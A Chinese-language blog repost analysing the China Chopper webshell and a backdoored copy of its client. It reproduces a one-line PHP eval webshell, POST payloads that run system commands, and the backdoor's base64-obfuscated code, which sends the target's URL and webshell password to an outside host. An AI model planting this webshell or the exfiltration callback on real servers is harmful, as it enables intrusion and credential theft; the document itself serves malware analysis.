0x00 前言
0x01 基本知识
中国菜刀
winsock expert
UPX
Wireshark
PEID
工具下载地址:
0x02 分析正常菜刀
2.1 静态分析中国菜刀
2.2 动态分析菜刀
环境: 靶机:Windows server 2003 –192.168.1.134 攻击机:Windows 7–192.168.1.131
<?php @eval($_POST['chopper']);?>
z0=@ini_set(“display_errors”,”0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(“>|”);;$p=base64_decode($_POST[“z1”]);$s=base64_decode($_POST[“z2”]);$d=dirname($_SERVER[“SCRIPT_FILENAME”]);$c=substr($d,0,1)==”/“?”-c “{$s}”“:”/c “{$s}”“;$r=”{$p} {$c}”;@system($r.” 2>&1”,$ret);print ($ret!=0)?”ret={$ret}”:””;;echo(“|<-“);die();
z1=cmd
z2=cd /d “C:\phpStudy\PHPTutorial\WWW”&netstat -an | find “ESTABLISHED”&echo [S]&cd&echo [E]
0x03 分析后门菜刀
a=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwo
YmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd
0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKR
jlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGem
N6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xp
bWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWR
VJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pO
yRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaX
NfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP
0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cn
JlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7
a=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlM
U1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZD
NkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlU
wVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5p
X3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUo
MCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGl
ybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2Z
vcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnV
uY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXN
yPSgkdSk/JHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmlud
CAkUjs7ZWNobygifDwtIik7ZGllKCk7_
@eval(base64_decode(*aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL
3d3dy5nb29kZG9nLmluL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1
VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9*));@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_
runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists(*posix_getegid*))?@posix_getpwuid(@posix_geteuid()):**;$usr=($u)?$u[*name*]:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
if($_COOKIE[*Lyke*]!=1){setcookie(*Lyke*,1);@file(*http://www.gooddog.in/Api.php?Url=*.$_SERVER[*HTTP_HOST*].$_SERVER[*REQUEST_URI*].*&Pass=*.key($_POST));}
0x04 总结
转载自 madcoding’s blog